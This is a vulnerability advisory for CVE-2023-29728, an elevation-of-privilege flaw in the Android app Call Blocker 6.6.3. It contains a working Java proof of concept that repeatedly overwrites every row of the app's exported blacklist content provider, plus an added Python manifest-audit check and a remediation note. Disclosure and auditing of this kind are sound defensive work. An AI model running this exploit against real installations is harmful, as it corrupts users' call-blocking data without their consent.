Escalation of Privileges exists in Call Blocker (CVE-2023-29728)

Vendor: Fiorenza Francesco (https://www.call-blocker.info/)

Affected product: Call Blocker (com.cuiet.blockCalls)

Version: 6.6.3

Download link: https://play.google.com/store/apps/details?id=com.cuiet.blockCalls

Description of the vulnerability for use in the CVE: The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.

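PoC:

```java
// Called from a Context subclass (Activity or Service) in another app; uses
// android.content.ContentResolver, android.content.ContentValues and android.net.Uri.
public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    while (true) {
        // Blacklist table exposed through Call Blocker's content provider.
        Uri uri = Uri.parse("content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList");
        ContentValues contentValues = new ContentValues();
        contentValues.put("photo_uri", "123456789");
        contentValues.put("numeroContatto", "987654321");
        // Null selection: the update applies to every row in the table.
        contentResolver.update(uri, contentValues, null, null);
    }
}
```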
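The PoC only succeeds if the provider accepts `update()` calls from other apps without a write permission. The following audit check is an added example, not part of the original advisory or the vendor's code: it scans a decoded `AndroidManifest.xml` for providers in that state. The manifest is constructed for illustration (the app's real manifest is not shown on the page; only the first authority string comes from the PoC), and the function name `audit_providers` is hypothetical.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed sample, NOT the app's real manifest (the page does not show it).
# Only the first authority string is taken from the PoC URI.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <permission android:name="com.example.WRITE" android:protectionLevel="signature"/>
  <permission android:name="com.example.WEAK" android:protectionLevel="normal"/>
  <application>
    <provider android:authorities="com.cuiet.blockCalls.ContProvBlockCalls"
              android:exported="true"/>
    <provider android:authorities="com.example.weak" android:exported="true"
              android:writePermission="com.example.WEAK"/>
    <provider android:authorities="com.example.signed" android:exported="true"
              android:writePermission="com.example.WRITE"/>
    <provider android:authorities="com.example.private" android:exported="false"/>
  </application>
</manifest>
"""

def audit_providers(manifest_xml):
    """Return (authority, reason) for each provider other apps can write to."""
    root = ET.fromstring(manifest_xml.strip())
    # Protection level of every permission this manifest declares itself.
    levels = {p.get(A + "name"): p.get(A + "protectionLevel", "normal")
              for p in root.findall("permission")}
    findings = []
    for app in root.findall("application"):
        app_perm = app.get(A + "permission")  # default for all components
        for prov in app.findall("provider"):
            # Assumption: targetSdkVersion >= 17, where a provider without
            # an explicit android:exported attribute is not exported.
            if prov.get(A + "exported") != "true":
                continue
            # writePermission takes precedence over permission for writes.
            perm = (prov.get(A + "writePermission")
                    or prov.get(A + "permission") or app_perm)
            authority = prov.get(A + "authorities")
            if perm is None:
                findings.append((authority, "exported without write permission"))
            elif "signature" not in levels.get(perm, "undeclared"):
                findings.append((authority, "write permission %s is %s"
                                 % (perm, levels.get(perm, "undeclared"))))
    return findings
```

A finding of the first kind is resolved by setting `android:exported="false"` or by guarding the provider with a signature-level permission.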